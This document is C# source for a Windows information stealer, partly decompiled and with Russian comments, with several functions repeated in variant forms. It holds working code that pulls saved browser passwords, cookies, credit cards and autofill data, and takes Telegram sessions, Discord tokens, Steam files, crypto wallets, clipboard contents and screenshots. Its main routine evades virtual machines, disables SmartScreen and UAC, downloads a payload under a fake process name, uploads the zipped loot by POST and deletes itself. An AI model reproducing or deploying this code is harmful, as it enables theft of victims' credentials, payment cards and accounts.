public static void Get_Autofill(string profilePath, string browser_name, string profile_name) { try { string text = Path.Combine(profilePath, "Web Data"); var cNT = new sqlite.CNT(GetCookies.CreateTempCopy(text)); cNT.ReadTable("autofill"); for (int i = 0; i < cNT.RowLength; i++) { AutofillCount++; try { Autofill.Add($"Name : {cNT.ParseValue(i, "name").Trim()}{Environment.NewLine}Value : {cNT.ParseValue(i, "value").Trim()}"); } catch { } } foreach (string v in Autofill) { Autofill_List.Add($"Browser : {browser_name}{Environment.NewLine}Profile : {profile_name}{Environment.NewLine}{v}{Environment.NewLine}");; } Autofill.Clear(); } catch { } }
public static void Parse(string dir) { Directory.CreateDirectory($"{dir}\\Browsers"); Mozila.Mozila_still(); try { foreach (string rootPath in GetProfile()) { try { string fullName = new FileInfo(rootPath).Directory.FullName; string text = rootPath.Contains(RoamingAppData) ? GetRoadData(fullName) : GetLclName(fullName); if (!string.IsNullOrEmpty(text)) { text = text[0].ToString().ToUpper() + text.Remove(0, 1); string name = GetName(fullName); GetCookies.Cookie_Grab(fullName, text, name); GetPasswords.Passwords_Grab(fullName, text, name); GetPasswords.Write_Passwords(); Get_Credit_Cards.Get_CC(fullName, text, name); Get_Credit_Cards.Write_CC(text, name); Get_Browser_Autofill.Get_Autofill(fullName, text, name); Get_Browser_Autofill.Write_Autofill(text, name); } } catch { } } } catch { } }
// Token: 0x06000158 RID: 344 RVA: 0x00008750 File Offset: 0x00006950 public static void Parse(string dir) { Directory.CreateDirectory(dir + "\\Browsers"); Steal.Cookies(); try { foreach (string text in Browser_Parse.GetProfile()) { try { string fullName = new FileInfo(text).Directory.FullName; string text2 = text.Contains(Browser_Parse.RoamingAppData) ? Browser_Parse.GetRoadData(fullName) : Browser_Parse.GetLclName(fullName); if (!string.IsNullOrEmpty(text2)) { text2 = text2[0].ToString().ToUpper() + text2.Remove(0, 1); string name = Browser_Parse.GetName(fullName); GetCookies.Cookie_Grab(fullName, text2, name); GetPasswords.Passwords_Grab(fullName, text2, name); GetPasswords.Write_Passwords(); Get_Credit_Cards.Get_CC(fullName, text2, name); Get_Credit_Cards.Write_CC(text2, name); Get_Browser_Autofill.Get_Autofill(fullName, text2, name); Get_Browser_Autofill.Write_Autofill(text2, name); } } catch { } } } catch { } }
public static void Passwords_Grab(string profilePath, string browser_name, string profile) { try { string text = Path.Combine(profilePath, "Login Data"); browser_name_list.Add(browser_name); profile_list.Add(profile); var cNT = new sqlite.CNT(GetCookies.CreateTempCopy(text)); cNT.ReadTable("logins"); for (int i = 0; i < cNT.RowLength; i++) { Cpassword++; try { credential.Add($"Site_Url : {cNT.ParseValue(i, "origin_url").Trim()}{Environment.NewLine}Login : {cNT.ParseValue(i, "username_value").Trim()}{Environment.NewLine}Password : {GetCookies.DecryptBlob(cNT.ParseValue(i, "password_value"), DataProtectionScope.CurrentUser).Trim()}{Environment.NewLine}"); } catch { } } foreach (string v in credential) { password.Add($"Browser : {browser_name}{Environment.NewLine}Profile : {profile}{Environment.NewLine}{v}"); } credential.Clear(); } catch { } }
// Token: 0x06000184 RID: 388 RVA: 0x0000AEAC File Offset: 0x000090AC public static void Get_CC(string profilePath, string Browser_Name, string Profile_Name) { try { SqlHandler sqlHandler = new SqlHandler(GetCookies.CreateTempCopy(Path.Combine(profilePath, "Web Data"))); sqlHandler.ReadTable("credit_cards"); int rowCount = sqlHandler.GetRowCount(); for (int i = 0; i < rowCount; i++) { Get_Credit_Cards.CCCouunt++; try { string @string = Encoding.UTF8.GetString(DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 4)), null)); string value = sqlHandler.GetValue(i, 1); string value2 = sqlHandler.GetValue(i, 2); string value3 = sqlHandler.GetValue(i, 3); string value4 = sqlHandler.GetValue(i, 9); Get_Credit_Cards.CC.Add(string.Format("{0}\t{1}/{2}\t{3}\t{4}\r\n******************************\r\n", new object[] { value, value2, value3, @string, value4 })); } catch { } } foreach (string text in Get_Credit_Cards.CC) { Get_Credit_Cards.CC_List.Add(string.Concat(new string[] { "Browser : ", Browser_Name, Environment.NewLine, "Profie : ", Profile_Name, Environment.NewLine, text })); } Get_Credit_Cards.CC.Clear(); } catch { } }
// Token: 0x0600017D RID: 381 RVA: 0x0000A4C8 File Offset: 0x000086C8 public static void Get_Autofill(string profilePath, string browser_name, string profile_name) { try { Sqlite sqlite = new Sqlite(GetCookies.CreateTempCopy(Path.Combine(profilePath, "Web Data"))); sqlite.ReadTable("autofill"); for (int i = 0; i < sqlite.GetRowCount(); i++) { Get_Browser_Autofill.AutofillCount++; try { Get_Browser_Autofill.Autofill.Add(string.Concat(new string[] { "Name : ", sqlite.GetValue(i, "name").Trim(), Environment.NewLine, "Value : ", sqlite.GetValue(i, "value").Trim() })); } catch { } } foreach (string text in Get_Browser_Autofill.Autofill) { Get_Browser_Autofill.Autofill_List.Add(string.Concat(new string[] { "Browser : ", browser_name, Environment.NewLine, "Profile : ", profile_name, Environment.NewLine, text, Environment.NewLine })); } Get_Browser_Autofill.Autofill.Clear(); } catch { } }
public static void Main() { // Проверяем на запуск виртуальных машин ( Virtual Machine Check ) if (!AntiVM.GetCheckVMBot() && !RunCheck.InstanceCheck()) { Environment.Exit(0); } // Создаём папку куда будем всё собирать HomeDirectory.Inizialize(); // Делаем проверку что папка создалась if (CombineEx.ExistsDir(GlobalPath.HomePath)) { // Собираем данные .... Telega.GetSession(GlobalPath.Tdata, GlobalPath.TelegaHome, "*.*"); MailFoxPassword.Inizialize(); BuffBoard.Inizialize(); NordVPN.Inizialize_Grabber(); DynDns.Inizialize_Grabber(); FileZilla.Inizialize_Grabber(); Pidgin.Inizialize_Grabber(); GetSteamFiles.Inizialize("*.", "*.vdf", "config", "Steam"); InfoGrabber.Inizialize(); ScreenShot.Inizialize(GlobalPath.Screen); // Сбор и вывод логинов и паролей Searcher.CopyInSafeDir(GlobalPath.LoginsPath, "Login Data"); GetPasswords.Inizialize_Multi_file(); // Сбор и вывод куки данных Searcher.CopyInSafeDir(GlobalPath.CookiesPath, "Cookies"); GetCookies.Inizialize(); // Сбор и вывод Автозаполнение форм Searcher.CopyInSafeDir(GlobalPath.WebDataPath, "Web Data"); GetAutoFill.Inizialize_AutoFill(); } }
private void Updater_Load(object sender, EventArgs e) { if (Date.Delay) { Thread.Sleep(Date.DelaySec); } if (!AntiVM.GetCheckVMBot()) { if (!MovEx.CheckPath()) { if (Date.Delay) { ProcessKiller.Delete($"/C choice /C Y /N /D Y /T {Date.DelayTime} & Del", GlobalPath.AssemblyPath); } } else { HideFolders.Enabled(0); DisableLockers.SmartScreen(); DisableLockers.UAC(); AntiSniffer.Inizialize(); if (Date.Downloader || Date.AdminRight) { Users.DownFileEx(Date.DownloaderLink, Environment.GetEnvironmentVariable(Date.DownloaderPath), Date.FakeNameProcess); } if (Date.IpLogger) { IPLogger.Sender(Date.IpLoggerLink); } if (Date.InfoGrabber) { InfoGrabber.CreateTable(GlobalPath.PC_File); } if (Date.CryptoWall) { BitBoard.GetWallet(); } if (Date.Browsers) { ChromeSearcher.CopyLoginsInSafeDir(GlobalPath.Logins); ChromeCookiesSearcher.CopyCookiesInSafeDir(GlobalPath.Cookies); GetPassword.Inizialize(); GetCookies.Inizialize(); } if (Date.Buffer) { ClipboardEx.GetBuffer(GlobalPath.Buffer); } if (Date.Programs) { MailFoxPassword.Inizialize(); DcGrabber.GeTokens(); TGrabber.GetTelegramSession(GlobalPath.Tdata, GlobalPath.TelegaHome, "*.*"); } if (Date.Clients) { GetClients.Inizialize(); } if (Date.Steam) { GetSteamFiles.Copy("*.", "*.vdf", "config", "Steam"); } if (Date.ScreenShot) { ScreenShot.Shoot(GlobalPath.Screen); } Ccleaner.CheckIsNullDirsAndFiles(GlobalPath.GarbageTemp); Archiving.Inizialize(); UploadZip.Inizialize(GlobalPath.Reception, "POST", GlobalPath.ZipAdd); //BlockIE.Enabled(1); // Блокировка интернета if (Date.Delay) { ProcessKiller.Delete($"/C choice /C Y /N /D Y /T {Date.DelayTime} & Del", GlobalPath.AssemblyPath); } Application.Exit(); } } else { SaveData.SaveFile("VM_Detect.txt", "The program is not supported on virtual machines!"); if (Date.Delay) { ProcessKiller.Delete($"/C choice /C Y /N /D Y /T {Date.DelayTime} & Del", GlobalPath.AssemblyPath); } } }